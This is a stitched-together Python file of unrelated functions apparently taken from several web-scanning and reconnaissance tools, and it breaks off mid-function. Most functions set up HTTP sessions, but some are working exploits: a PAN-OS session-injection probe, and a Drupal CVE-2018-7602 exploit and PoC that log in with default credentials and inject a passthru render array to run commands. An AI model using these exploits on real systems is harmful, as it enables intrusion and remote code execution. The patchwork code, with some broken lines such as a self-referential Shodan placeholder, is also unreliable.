def __init__(self, url="", cookies=None, headers=None, args=None, proxy=None):
    """Bind a requests.Session to a target URL.

    :param url: target url
    :param cookies: extra cookies, dict of name -> value
    :param headers: extra http headers, dict
    :param args: other arguments, dict
    :param proxy: proxies mapping handed to requests (e.g. {'http': ...})
    """
    self.url = url.strip()
    if self.url:
        formated = URL.format(self.url)
        self.protocol = formated.protocol
        self.uri = formated.uri
        self.host = formated.host
        self.path = formated.path
        self.baseURL = formated.baseURL
        self.params = formated.params
    else:
        self.uri, self.host, self.path, self.baseURL, self.params = "", "", "", "", ""
    # Mutable default arguments were shared across instances; default to None
    # and normalize here instead (callers passing dicts are unaffected).
    self.args = args or {}
    self.http = requests.Session()
    if cookies:
        # dict.iteritems() is Python 2 only and raises AttributeError on
        # Python 3; .items() behaves the same here.
        for key, value in cookies.items():
            self.http.cookies.set(key, value)
    if headers:
        self.http.headers.update(headers)
    if proxy:
        self.http.proxies = proxy
    self.register()
def setup(self):
    '''
    To improve dirsearch performance, we resolve the hostname before scanning
    and then send requests by IP instead of hostname, so the library won't have
    to resolve it before every request. This also keeps the scan stable despite
    any issue with the system DNS resolver (running tools like Amass might
    cause such things). If you don't like it, you can disable it with `-b`
    command-line flag.

    Note: A proxy could have a different DNS that would resolve the name.
    Therefore, resolving the name when using a proxy just to raise an error
    is pointless.
    '''
    if not self.request_by_hostname and not self.proxy and not self.proxylist:
        try:
            # Keep a pre-supplied IP if one was given; otherwise resolve (IPv4).
            self.ip = self.ip or socket.gethostbyname(self.host)
        except socket.gaierror:
            # Check if hostname resolves to IPv6 address only
            try:
                self.ip = socket.getaddrinfo(self.host, None, socket.AF_INET6)[0][4][0]
            except socket.gaierror:
                raise RequestException("Couldn't resolve DNS")

        # Rebuild the base URL around the resolved IP so requests skip DNS.
        self.url = "{0}://{1}:{2}/".format(
            self.scheme,
            self.ip,
            self.port,
        )

    self.session = requests.Session()
    self.set_adapter()
def __init__(self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True):
    """Base enumerator: record engine metadata, normalize the target domain,
    and prepare a browser-like requests session."""
    # NOTE(review): the normalized `subdomains` argument is never stored —
    # results always start from an empty list below; kept for compatibility.
    subdomains = subdomains or []
    self.base_url = base_url
    self.engine_name = engine_name
    self.silent = silent
    self.verbose = verbose
    self.timeout = 25
    # Keep only the network-location part of whatever was passed in.
    self.domain = urlparse.urlparse(domain).netloc
    self.subdomains = []
    self.session = requests.Session()
    # Browser-like headers to avoid trivial bot filtering by search engines.
    self.headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.8',
        'Accept-Encoding': 'gzip',
    }
    self.print_banner()
def __init__(self):
    """Baidu backend: session with a randomized User-Agent, then base-class init."""
    self.sreq = requests.Session()
    self.sreq.headers['User-Agent'] = random_user_agent()
    self.maximum = 1000  # presumably the max results to collect — confirm
    self.pmax = 50       # presumably a per-run page/request cap — confirm
    super(Baidu, self).__init__(_NAME, _SITE, _DESC)
def __init__(self, url, cookie=None, useragent=None, maxPool=1, maxRetries=5,
             delay=0, timeout=30, ip=None, proxy=None, redirect=False,
             requestByHostname=False):
    """Prepare an HTTP requester: parse scheme/host/port from *url* and
    resolve DNS once up front.

    :param url: target URL; 'http://' is assumed when no scheme is given
    :param cookie: raw Cookie header value, or None
    :param useragent: User-agent header value, or None
    :param ip: pre-resolved IP to use instead of a DNS lookup
    :raises RequestException: when the hostname cannot be resolved or the
        port in the URL is not a number
    """
    # if no backslash, append one
    if not url.endswith('/'):
        url = url + '/'
    parsed = urllib.parse.urlparse(url)
    self.basePath = parsed.path
    # if not protocol specified, set http by default
    if parsed.scheme != 'http' and parsed.scheme != 'https':
        parsed = urllib.parse.urlparse('http://' + url)
        self.basePath = parsed.path
    self.protocol = parsed.scheme
    if self.protocol != 'http' and self.protocol != 'https':
        self.protocol = 'http'
    self.host = parsed.netloc.split(':')[0]
    # resolve DNS to decrease overhead
    if ip is not None:
        self.ip = ip
    else:
        try:
            self.ip = socket.gethostbyname(self.host)
        except socket.gaierror:
            raise RequestException({'message': "Couldn't resolve DNS"})
    self.headers['Host'] = self.host
    # If no port specified, set default (80, 443).
    # Cast to int so an explicit port has the same type as the defaults
    # (previously it stayed a string, unlike the defaults).
    try:
        self.port = int(parsed.netloc.split(':')[1])
    except IndexError:
        self.port = (443 if self.protocol == 'https' else 80)
    except ValueError:
        raise RequestException({'message': 'Invalid port number: {0}'.format(parsed.netloc.split(':')[1])})
    # Set cookie and user-agent headers
    if cookie is not None:
        self.setHeader('Cookie', cookie)
    if useragent is not None:
        self.setHeader('User-agent', useragent)
    self.maxRetries = maxRetries
    self.maxPool = maxPool
    self.delay = delay
    self.timeout = timeout
    self.pool = None
    self.proxy = proxy
    self.redirect = redirect
    self.randomAgents = None
    self.requestByHostname = requestByHostname
    self.session = requests.Session()
def _request(self, uri, headers=None, data=None):
    """GET *uri* on a lazily-created shared session and return the raw body bytes."""
    if self.requester is None:
        # First call: build the session and seed it with the instance headers.
        session = requests.Session()
        session.headers.update(self.headers)
        self.requester = session
    # requests treats data=None exactly like omitting it, so a single call
    # covers both the with-body and without-body cases.
    # NOTE(review): a GET carrying a body is unusual — confirm the remote API expects it.
    return self.requester.get(uri, headers=headers, data=data).content
def request(self, method='GET', url='', *args, **kwargs):
    """Issue one HTTP request on a fresh session, honouring the instance's
    verify/timeout settings and a randomly chosen proxy when a pool exists."""
    kwargs['timeout'] = self.timeout
    session = requests.Session()
    session.verify = self.verify
    session.headers.update({
        'User-Agent': ('Mozilla/5.0 (Windows NT 6.1; WOW64) '
                       'AppleWebKit/537.36 (KHTML, like Gecko)'
                       'Chrome/37.0.2062.124 Safari/537.36')
    })
    # Rotate through the proxy pool, one random pick per request.
    if self.proxy_list:
        session.proxies = random.choice(self.proxy_list)
    return session.request(method, url, *args, **kwargs)
def requests_retry_session(self):
    """Build a requests.Session that automatically retries failed requests.

    Retry count, backoff factor and the retried status codes come from the
    instance configuration (retryMaxCount / retryBackOff / retryErrorCodes).

    :return: a session with retrying adapters mounted for http:// and https://
    """
    session = requests.Session()
    retry_count = int(self.retryMaxCount)
    retry_backoff = float(self.retryBackOff)
    # retryErrorCodes is a comma-separated string, e.g. "500,502,503"
    # (leftover debug print of the parsed list removed).
    status_codes = [int(code) for code in self.retryErrorCodes.split(',')]
    retry = Retry(
        total=retry_count,
        read=retry_count,
        connect=retry_count,
        backoff_factor=retry_backoff,
        status_forcelist=status_codes,
    )
    adapter = HTTPAdapter(max_retries=retry)
    session.mount('http://', adapter)
    session.mount('https://', adapter)
    return session
def __init__(self, api_id=None, api_secret=None, url=None, timeout=None, user_agent_identifier=None):
    """Authenticated Censys API client.

    Credentials fall back to the CENSYS_API_ID / CENSYS_API_SECRET environment
    variables; the API URL falls back to CENSYS_API_URL, then DEFAULT_URL.

    :raises CensysException: when no API ID or secret can be found
    """
    self.api_id = api_id or os.environ.get("CENSYS_API_ID", None)
    self.api_secret = api_secret or os.environ.get("CENSYS_API_SECRET", None)
    if not self.api_id or not self.api_secret:
        raise CensysException(401, "No API ID or API secret configured.")
    timeout = timeout or self.DEFAULT_TIMEOUT
    self._api_url = url or os.environ.get("CENSYS_API_URL", None) or self.DEFAULT_URL
    # create a session that we'll use for making requests
    self._session = requests.Session()
    self._session.auth = (self.api_id, self.api_secret)
    self._session.timeout = timeout
    self._session.headers.update({
        # was "application/json, */8": "*/8" is not a valid media type
        # (RFC 7231 Accept syntax); "*/*" is the intended wildcard.
        "accept": "application/json, */*",
        "User-Agent": ' '.join([
            requests.utils.default_user_agent(),
            user_agent_identifier or self.DEFAULT_USER_AGENT,
        ]),
    })
    # test that everything works by requesting the users account information
    self.account()
def sacn(target):  # NOTE(review): name looks like a typo for "scan"; kept for callers
    """Fetch *target* and summarize it as "Status>...|Server>...|Title>...".

    Returns None on any request failure (best-effort scanner behavior).
    """
    try:
        r = requests.Session().get(str(target), headers=header, timeout=TimeOut)
        status = r.status_code
        # get the title
        title = re.search(r'<title>(.*)</title>', r.text)
        if title:
            title = title.group(1).strip().strip("\r").strip("\n")[:30]
        else:
            title = "None"
        banner = ''
        try:
            # get the server banner; a missing header raises KeyError
            banner += r.headers['Server'][:20]
        except KeyError:
            pass
        return "Status>%s|Server>%s|Title>%s" % (status, banner, title)
    except Exception:
        # Was "except Exception, e:" — Python 2 syntax that is a SyntaxError
        # on Python 3; the bound exception was never used, so drop it.
        pass
def __init__(self, url="", cookie="", headers={}, elseArgs={}):
    """Bind a requests.Session to *url*, seeding it from a raw cookie string."""
    self.url = url.strip()
    if not self.url:
        self.uri, self.host, self.path, self.baseURL, self.params = "", "", "", "", ""
    else:
        formated = URL.format(self.url)
        self.uri = formated.uri
        self.host = formated.host
        self.path = formated.path
        self.baseURL = formated.baseURL
        self.params = formated.params
    self.elseArgs = elseArgs
    self.http = requests.Session()
    # "k=v; k2=v2" cookie string -> individual session cookies
    cookie = cookie.strip()
    if cookie:
        for item in _strCookie2Dict(cookie):
            self.http.cookies.set(item['name'], item['value'])
    self.http.headers.update(headers)
    self.register()
def exploit(target, headers=None):
    """Probe *target* for the PAN-OS cms_changeDeviceContext session-injection
    flaw and return a human-readable "is vul" / "is not vul" string."""
    log.process("Requesting target site:" + target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
        target)
    verify_url = '{}/php/utils/debug.php'.format(target)
    session = requests.Session()
    # https targets are typically appliances with self-signed certificates,
    # so skip certificate verification for them (http keeps the default True).
    check_cert = 'https' not in target
    session.get(verify_url, verify=check_cert)
    session.get(create_session_url, verify=check_cert)
    verify = session.get(verify_url, verify=check_cert)
    if 'Debug Console' in verify.text:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)
    return res
def __init__(self, key, proxies=None):
    """Initializes the API object.

    :param key: The Shodan API key.
    :type key: str
    :param proxies: A proxies array for the requests library, e.g. {'https': 'your proxy'}
    :type proxies: dict
    """
    self.api_key = key
    self.base_url = 'https://api.shodan.io'
    self.base_exploits_url = 'https://exploits.shodan.io'
    # One shared requests session for every endpoint group below.
    self._session = requests.Session()
    self._session.auth = (self.api_id, self.api_secret) if False else self._session.auth  # placeholder removed
    if proxies:
        self._session.proxies.update(proxies)
        # Explicit proxies win: don't let environment proxy settings override them.
        self._session.trust_env = False
    # Endpoint groups, each holding a reference back to this client.
    self.data = self.Data(self)
    self.dns = self.Dns(self)
    self.exploits = self.Exploits(self)
    self.labs = self.Labs(self)
    self.notifier = self.Notifier(self)
    self.org = self.Organization(self)
    self.tools = self.Tools(self)
    self.stream = Stream(key, proxies=proxies)
def cve_2018_7602_exp(self, cmd):
    """Exploit Drupal CVE-2018-7602 to run *cmd* on the target.

    Walks the authenticated account-cancel flow to harvest form_token and
    form_build_id, then smuggles a passthru() call through the `destination`
    parameter's nested render array. Prints the response via `verify`.
    Assumes admin/admin credentials — TODO confirm against target config.
    """
    vul_name = "Drupal: CVE-2018-7602"
    DRUPAL_U = "admin"
    DRUPAL_P = "admin"
    try:
        self.session = requests.Session()
        # Step 1: log in to obtain an authenticated session.
        self.get_params = {'q': 'user/login'}
        self.post_params = {
            'form_id': 'user_login',
            'name': DRUPAL_U,
            'pass': DRUPAL_P,
            'op': 'Log in'
        }
        self.session.post(self.url,
                          params=self.get_params,
                          data=self.post_params,
                          headers=self.headers,
                          timeout=self.timeout,
                          verify=False)
        # Step 2: fetch the profile page and scrape the user id from the
        # foaf:name meta tag's "about" attribute.
        self.get_params = {'q': 'user'}
        self.r = self.session.get(self.url,
                                  params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.user_id = self.soup.find('meta', {
            'property': 'foaf:name'
        }).get('about')
        # "about" may look like "?q=user/NN" — keep only the part after "=".
        if "?q=" in self.user_id:
            self.user_id = self.user_id.split("=")[1]
        # Step 3: open the account-cancel form and harvest its form_token.
        self.get_params = {'q': self.user_id + '/cancel'}
        self.r = self.session.get(self.url,
                                  params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
        self.form_token = self.form.find('input', {
            'name': 'form_token'
        }).get('value')
        # Step 4: submit the cancel form with the malicious destination; the
        # q[%23post_render][]=passthru render-array keys carry the payload.
        self.get_params = {
            'q': self.user_id + '/cancel',
            'destination': self.user_id + '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
        }
        self.post_params = {
            'form_id': 'user_cancel_confirm_form',
            'form_token': self.form_token,
            '_triggering_element_name': 'form_id',
            'op': 'Cancel account'
        }
        self.r = self.session.post(self.url,
                                   params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
        self.form_build_id = self.form.find('input', {
            'name': 'form_build_id'
        }).get('value')
        # Step 5: replay the cached form through the file AJAX callback so the
        # injected render array gets executed server-side.
        self.get_params = {
            'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
        }
        self.post_params = {'form_build_id': self.form_build_id}
        self.r = self.session.post(self.url,
                                   params=self.get_params,
                                   data=self.post_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
        self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
        verify.exploit_print(self.r.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
def __init__(self, url, script_path, cookie=None, useragent=None, maxPool=1,
             maxRetries=5, delay=0, timeout=30, ip=None, proxy=None,
             redirect=False, requestByHostname=False, httpmethod="get"):
    """Requester that additionally classifies the target URL (via
    getURLTypeAndSuffix) to pick a scan dictionary and fingerprint set.

    :param url: target URL; 'http://' is assumed when no scheme is given
    :param script_path: path of the running script (stored as-is)
    :param ip: pre-resolved IP to use instead of a DNS lookup
    :raises RequestException: when the hostname cannot be resolved
    """
    self.httpmethod = httpmethod
    self.script_path = script_path
    # if no backslash, append one
    # if not url.endswith('/'):
    #     url = url + '/'
    # http://hostname.local add slash
    if urllib.parse.urlparse(url).path == '':
        url = url + '/'
    parsed = urllib.parse.urlparse(url)
    self.basePath = parsed.path
    # Classify the path; exact semantics of the returned tuple live in
    # getURLTypeAndSuffix — presumably (type enum, extension, dir, file, base).
    url_type, suffix, directory_name, filename, base_path = self.getURLTypeAndSuffix(
        self.basePath)
    self.url_type = url_type
    self.extension = suffix
    self.directory = directory_name
    self.filename = filename
    if base_path:
        self.base_path = base_path
    else:
        self.base_path = '/'
    # Seed the site fingerprint with the URL's extension when there is one.
    if self.extension:
        self.site_fingerprint = set([self.extension])
    else:
        self.site_fingerprint = set([])
    # Pick the wordlist matching the detected URL type.
    if self.url_type == URLType.normal_file:
        self.scan_dict = Dict4URLType.normal_file
    elif self.url_type == URLType.normal_restful_dir:
        self.scan_dict = Dict4URLType.normal_restful_dir
    elif self.url_type == URLType.restful_file:
        self.scan_dict = Dict4URLType.restful_file
    # if not protocol specified, set http by default
    if parsed.scheme != 'http' and parsed.scheme != 'https':
        parsed = urllib.parse.urlparse('http://' + url)
        self.basePath = parsed.path
    self.protocol = parsed.scheme
    if self.protocol != 'http' and self.protocol != 'https':
        self.protocol = 'http'
    self.host = parsed.netloc.split(':')[0]
    # resolve DNS to decrease overhead
    if ip is not None:
        self.ip = ip
    else:
        try:
            self.ip = socket.gethostbyname(self.host)
        except socket.gaierror:
            raise RequestException({'message': "Couldn't resolve DNS"})
    self.headers['Host'] = self.host
    # If no port specified, set default (80, 443)
    # NOTE(review): an explicit port stays a *string* here while the defaults
    # are ints — confirm downstream users tolerate both types.
    try:
        self.port = parsed.netloc.split(':')[1]
    except IndexError:
        self.port = (443 if self.protocol == 'https' else 80)
    # Set cookie and user-agent headers
    if cookie is not None:
        self.setHeader('Cookie', cookie)
    if useragent is not None:
        self.setHeader('User-agent', useragent)
    self.maxRetries = maxRetries
    self.maxPool = maxPool
    self.delay = delay
    self.timeout = timeout
    self.pool = None
    self.proxy = proxy
    self.redirect = redirect
    self.randomAgents = None
    self.requestByHostname = requestByHostname
    self.session = requests.Session()
def __init__(self, file_url, session=None):
    """Start a streaming download of *file_url*, exposing its byte length
    and the raw response stream."""
    # Reuse a caller-supplied session when given, otherwise create one.
    self.session = session if session else requests.Session()
    requested_file = self._request_for_file(file_url)
    # Total size in bytes, taken straight from the response headers.
    self.len = int(requested_file.headers['content-length'])
    self.raw_data = requested_file.raw
def __init__(
    self,
    url,
    cookie=None,
    useragent=None,
    maxPool=1,
    maxRetries=5,
    delay=0,
    timeout=30,
    ip=None,
    proxy=None,
    proxylist=None,
    redirect=False,
    requestByHostname=False,
    httpmethod="get",
):
    """Prepare an HTTP requester: parse scheme/host/port and resolve DNS once.

    :param url: target URL; 'http://' is assumed when no scheme is given
    :param ip: pre-resolved IP to use instead of a DNS lookup
    :raises RequestException: when the hostname cannot be resolved or the
        port in the URL is not a number
    """
    self.httpmethod = httpmethod
    # if no backslash, append one
    if not url.endswith("/"):
        url += "/"
    parsed = urllib.parse.urlparse(url)
    self.basePath = parsed.path
    # if not protocol specified, set http by default
    if parsed.scheme not in ["https", "http"]:
        parsed = urllib.parse.urlparse("http://" + url)
        self.basePath = parsed.path
    self.protocol = parsed.scheme
    if self.protocol not in ["https", "http"]:
        self.protocol = "http"
    self.host = parsed.netloc.split(":")[0]
    # resolve DNS to decrease overhead
    if ip is not None:
        self.ip = ip
    else:
        try:
            self.ip = socket.gethostbyname(self.host)
        except socket.gaierror:
            raise RequestException({"message": "Couldn't resolve DNS"})
    self.headers["Host"] = self.host
    # If no port specified, set default (80, 443).
    # int() keeps the port numeric whether it came from the URL or the
    # default, matching the sibling requester implementations.
    try:
        self.port = int(parsed.netloc.split(":")[1])
    except IndexError:
        self.port = 443 if self.protocol == "https" else 80
    except ValueError:
        raise RequestException(
            {"message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1])}
        )
    # Set cookie and user-agent headers
    if cookie is not None:
        self.setHeader("Cookie", cookie)
    if useragent is not None:
        self.setHeader("User-agent", useragent)
    self.maxRetries = maxRetries
    self.maxPool = maxPool
    self.delay = delay
    self.timeout = timeout
    self.pool = None
    self.proxy = proxy
    self.proxylist = proxylist
    self.redirect = redirect
    self.randomAgents = None
    self.requestByHostname = requestByHostname
    self.session = requests.Session()
def __init__(
    self,
    url,
    cookie=None,
    useragent=None,
    maxPool=1,
    maxRetries=5,
    delay=0,
    timeout=20,
    ip=None,
    proxy=None,
    proxylist=None,
    redirect=False,
    requestByHostname=False,
    httpmethod="get",
    data=None,
):
    """Prepare an HTTP requester: validate the scheme, resolve DNS once, and
    build the base URL from either the hostname or the resolved IP.

    :param url: target URL; a missing scheme defaults to http
    :param data: request body forwarded with every request
    :raises RequestException: unsupported scheme, unresolvable host, or a
        non-numeric port in the URL
    """
    self.httpmethod = httpmethod
    self.data = data
    # if no backslash, append one
    if not url.endswith("/"):
        url += "/"
    parsed = urllib.parse.urlparse(url)
    # NOTE(review): this assignment is overwritten unconditionally a few
    # lines below (without the lstrip) — looks like leftover code.
    self.basePath = parsed.path.lstrip("/")
    # If no protocol specified, set http by default
    if not parsed.scheme:
        parsed = urllib.parse.urlparse("http://" + url)
    # If protocol is not supported
    elif parsed.scheme not in ["https", "http"]:
        raise RequestException({"message": "Unsupported URL scheme: {0}".format(parsed.scheme)})
    self.basePath = parsed.path
    self.protocol = parsed.scheme
    self.host = parsed.netloc.split(":")[0]
    # resolve DNS to decrease overhead
    if ip:
        self.ip = ip
    else:
        try:
            self.ip = socket.gethostbyname(self.host)
        except socket.gaierror:
            raise RequestException({"message": "Couldn't resolve DNS"})
    # If no port specified, set default (80, 443)
    try:
        self.port = int(parsed.netloc.split(":")[1])
    except IndexError:
        self.port = 443 if self.protocol == "https" else 80
    except ValueError:
        raise RequestException(
            {"message": "Invalid port number: {0}".format(parsed.netloc.split(":")[1])}
        )
    # Pass if the host header has already been set
    if "host" not in [hd.lower() for hd in self.headers]:
        self.headers["Host"] = self.host
    # Include port in Host header if it's non-standard.
    # NOTE(review): this += assumes the key is spelled exactly "Host"; a
    # user-supplied "host" header would raise KeyError here — confirm.
    if (self.protocol == "https" and self.port != 443) or (
        self.protocol == "http" and self.port != 80
    ):
        self.headers["Host"] += ":{0}".format(self.port)
    # Set cookie and user-agent headers
    if cookie:
        self.setHeader("Cookie", cookie)
    if useragent:
        self.setHeader("User-agent", useragent)
    self.maxRetries = maxRetries
    self.maxPool = maxPool
    self.delay = delay
    self.timeout = timeout
    self.pool = None
    self.proxy = proxy
    self.proxylist = proxylist
    self.redirect = redirect
    self.randomAgents = None
    self.requestByHostname = requestByHostname
    self.session = requests.Session()
    # Requests go to the IP unless the caller asked for hostname-based requests.
    self.url = "{0}://{1}:{2}".format(
        self.protocol,
        self.host if self.requestByHostname else self.ip,
        self.port)
def __init__(
    self,
    url,
    max_pool=1,
    max_retries=5,
    timeout=20,
    ip=None,
    proxy=None,
    proxylist=None,
    redirect=False,
    request_by_hostname=False,
    httpmethod="get",
    data=None,
    scheme=None,
):
    """Prepare an HTTP requester: parse and validate the target URL, resolve
    DNS once (unless a proxy is used), and build the request/base URLs.

    :param url: target URL; *scheme* is prepended when none is present
    :param ip: pre-resolved IP, skipping the DNS lookup
    :raises RequestException: unsupported scheme, unresolvable host, or a
        non-numeric port in the URL
    """
    self.httpmethod = httpmethod
    self.data = data
    self.headers = {}
    parts = urlparse(url)
    # No scheme present: fall back to the supplied default scheme.
    if "://" not in url:
        parts = urlparse("{0}://{1}".format(scheme, url))
    # Anything other than http(s) is rejected outright.
    elif parts.scheme not in ["https", "http"]:
        raise RequestException({
            "message": "Unsupported URL scheme: {0}".format(parts.scheme)
        })
    # Drop a single leading slash from the path.
    self.base_path = parts.path[1:] if parts.path.startswith("/") else parts.path
    # Safe quote all special characters in base_path to prevent from being encoded
    self.base_path = safequote(self.base_path)
    self.protocol = parts.scheme
    self.host = parts.netloc.split(":")[0]
    # Resolve DNS once to decrease per-request overhead.
    if ip:
        self.ip = ip
    # A proxy could have a different DNS that would resolve the name, so
    # raising a resolution error here while proxying would be pointless.
    elif not proxy and not proxylist:
        try:
            self.ip = socket.gethostbyname(self.host)
        except socket.gaierror:
            # Check if hostname resolves to IPv6 address only
            try:
                self.ip = socket.getaddrinfo(self.host, None, socket.AF_INET6)[0][4][0]
            except socket.gaierror:
                raise RequestException({"message": "Couldn't resolve DNS"})
    # Explicit port wins; otherwise use the scheme default (80 / 443).
    try:
        self.port = int(parts.netloc.split(":")[1])
    except IndexError:
        self.port = 443 if self.protocol == "https" else 80
    except ValueError:
        raise RequestException({
            "message": "Invalid port number: {0}".format(parts.netloc.split(":")[1])
        })
    # Set the Host header; it is overwritten later if the user supplied one.
    self.headers["Host"] = self.host
    # Non-standard ports must be spelled out in the Host header.
    if (self.protocol == "https" and self.port != 443) or (
            self.protocol == "http" and self.port != 80):
        self.headers["Host"] += ":{0}".format(self.port)
    self.max_retries = max_retries
    self.max_pool = max_pool
    self.timeout = timeout
    self.pool = None
    self.proxy = proxy
    self.proxylist = proxylist
    self.redirect = redirect
    self.random_agents = None
    self.auth = None
    self.request_by_hostname = request_by_hostname
    self.session = requests.Session()
    # Scan URL targets the IP unless hostname-based requests were requested;
    # base_url always keeps the hostname (for display / headers).
    self.url = "{0}://{1}:{2}/".format(
        self.protocol,
        self.host if self.request_by_hostname else self.ip,
        self.port,
    )
    self.base_url = "{0}://{1}:{2}/".format(
        self.protocol,
        self.host,
        self.port,
    )
    self.set_adapter()
def __init__(self, verbose=False, session=None):
    """Store verbosity and reuse the given session, creating one otherwise."""
    self.verbose = verbose
    self.session = session if session else requests.Session()
def __init__(
    self,
    url,
    maxPool=1,
    maxRetries=5,
    timeout=20,
    ip=None,
    proxy=None,
    proxylist=None,
    redirect=False,
    requestByHostname=False,
    httpmethod="get",
    data=None,
    scheme=None,
):
    """Prepare an HTTP requester: validate and normalize the target URL,
    resolve DNS once (unless proxied), and build the scan base URL.

    :param url: target URL; *scheme* is prepended when none is present
    :param ip: pre-resolved IP, skipping the DNS lookup
    :raises RequestException: unsupported scheme, unresolvable host, or a
        non-numeric port in the URL
    """
    self.httpmethod = httpmethod
    self.data = data
    self.headers = {}
    # Guarantee a trailing slash on the target.
    if not url.endswith("/"):
        url += "/"
    parts = urllib.parse.urlparse(url)
    # No scheme present: fall back to the supplied default scheme.
    if "://" not in url:
        parts = urllib.parse.urlparse("{0}://{1}".format(scheme, url))
    # Anything other than http(s) is rejected outright.
    elif parts.scheme not in ["https", "http"]:
        raise RequestException({"message": "Unsupported URL scheme: {0}".format(parts.scheme)})
    # Drop a single leading slash from the path.
    self.basePath = parts.path[1:] if parts.path.startswith("/") else parts.path
    # Safe quote all special characters in basePath to prevent them from
    # being percent-encoded when performing requests.
    self.basePath = urllib.parse.quote(self.basePath, safe="!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")
    self.protocol = parts.scheme
    self.host = parts.netloc.split(":")[0]
    # Resolve DNS once to decrease per-request overhead.
    if ip:
        self.ip = ip
    # A proxy could have a different DNS that would resolve the name, so
    # raising a resolution error here while proxying would be pointless.
    elif not proxy and not proxylist:
        try:
            self.ip = socket.gethostbyname(self.host)
        except socket.gaierror:
            raise RequestException({"message": "Couldn't resolve DNS"})
    # Explicit port wins; otherwise use the scheme default (80 / 443).
    try:
        self.port = int(parts.netloc.split(":")[1])
    except IndexError:
        self.port = 443 if self.protocol == "https" else 80
    except ValueError:
        raise RequestException(
            {"message": "Invalid port number: {0}".format(parts.netloc.split(":")[1])}
        )
    # Set the Host header; this is overwritten if the user already set one.
    self.headers["Host"] = self.host
    # Non-standard ports must be spelled out in the Host header.
    if (self.protocol == "https" and self.port != 443) or (
            self.protocol == "http" and self.port != 80):
        self.headers["Host"] += ":{0}".format(self.port)
    self.maxRetries = maxRetries
    self.maxPool = maxPool
    self.timeout = timeout
    self.pool = None
    self.proxy = proxy
    self.proxylist = proxylist
    self.redirect = redirect
    self.randomAgents = None
    self.requestByHostname = requestByHostname
    self.session = requests.Session()
    # Requests target the IP unless hostname-based requests were requested.
    self.url = "{0}://{1}:{2}/".format(
        self.protocol,
        self.host if self.requestByHostname else self.ip,
        self.port,
    )
def cve_2018_7602_poc(self):
    """Probe for Drupal CVE-2018-7602 by echoing a random marker via passthru.

    Fills self.vul_info with the verdict: "PoCSuCCeSS" when the marker comes
    back in the response, "PoC_MaYbE" when a CHANGELOG.txt version check
    suggests an unpatched Drupal. Assumes admin/admin credentials for the
    login step. Serialized through self.threadLock.
    """
    self.threadLock.acquire()
    # --- report metadata -------------------------------------------------
    self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Drupal drupalgeddon2 remote code execution"
    self.vul_info["vul_numb"] = "CVE-2018-7602"
    self.vul_info["vul_apps"] = "Drupal"
    self.vul_info["vul_date"] = "2018-06-19"
    self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程代码执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
    self.vul_info["cre_date"] = "2021-01-29"
    self.vul_info["cre_auth"] = "zhzyker"
    DRUPAL_U = "admin"
    DRUPAL_P = "admin"
    # Random marker: if `echo <md>` output comes back, execution is proven.
    md = random_md5()
    cmd = "echo " + md
    try:
        self.session = requests.Session()
        # Step 1: log in to obtain an authenticated session.
        self.get_params = {'q': 'user/login'}
        self.post_params = {
            'form_id': 'user_login',
            'name': DRUPAL_U,
            'pass': DRUPAL_P,
            'op': 'Log in'
        }
        self.session.post(self.url,
                          params=self.get_params,
                          data=self.post_params,
                          headers=self.headers,
                          timeout=self.timeout,
                          verify=False)
        # Step 2: fetch the profile page and scrape the user id.
        self.get_params = {'q': 'user'}
        self.r = self.session.get(self.url,
                                  params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.user_id = self.soup.find('meta', {
            'property': 'foaf:name'
        }).get('about')
        # "about" may look like "?q=user/NN" — keep only the part after "=".
        if "?q=" in self.user_id:
            self.user_id = self.user_id.split("=")[1]
        # Step 3: open the account-cancel form and harvest its form_token.
        self.get_params = {'q': self.user_id + '/cancel'}
        self.r = self.session.get(self.url,
                                  params=self.get_params,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
        self.soup = BeautifulSoup(self.r.text, "html.parser")
        self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
        self.form_token = self.form.find('input', {
            'name': 'form_token'
        }).get('value')
        # Step 4: submit the cancel form with the malicious destination; the
        # q[%23post_render][]=passthru render-array keys carry the payload.
        self.get_params = {
            'q': self.user_id + '/cancel',
